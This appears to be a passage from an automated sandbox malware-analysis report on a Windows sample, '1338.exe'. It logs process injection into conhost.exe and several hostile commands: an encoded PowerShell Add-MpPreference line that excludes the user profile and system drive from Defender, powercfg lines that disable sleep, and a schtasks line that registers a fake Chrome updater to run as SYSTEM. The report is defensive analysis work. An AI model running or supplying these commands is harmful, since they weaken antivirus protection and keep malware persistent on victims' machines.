                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 6924 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5416Thread sleep count: 1590 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3596Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep count: 5990 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep count: 1915 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6924Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1590Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5990
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1915
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 35000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\1338.exeMemory written: C:\Windows\System32\conhost.exe base: 2779DCB0000Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\conhost.exe base: 27E76320000Jump to behavior
                    Encrypted powershell cmdline option found
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkq#> -Force <#ikyu#>
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkq#> -Force <#ikyu#>
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkq#> -Force <#ikyu#>Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded <#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkq#> -Force <#ikyu#>
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\1338.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2779DCB0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeMemory allocated: C:\Windows\System32\conhost.exe base: 27E76320000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\conhost.exe base: 400000 value starts with: 4D5AJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\System32\conhost.exeThread register set: target process: 6712Jump to behavior
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\Desktop\1338.exeThread created: C:\Windows\System32\conhost.exe EIP: 9DCB0000Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeThread created: C:\Windows\System32\conhost.exe EIP: 76320000Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4AJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4AJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Users\user\Desktop\1338.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\1338.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4AJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Google\Chrome\updater.exe^"'Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQCJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Google\Chrome\updater.exe"'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /run /tn "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4AJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "ossgiopsxzJump to behavior
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
                    Source: conhost.exe, 00000001.00000000.433112661.000002779E7A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
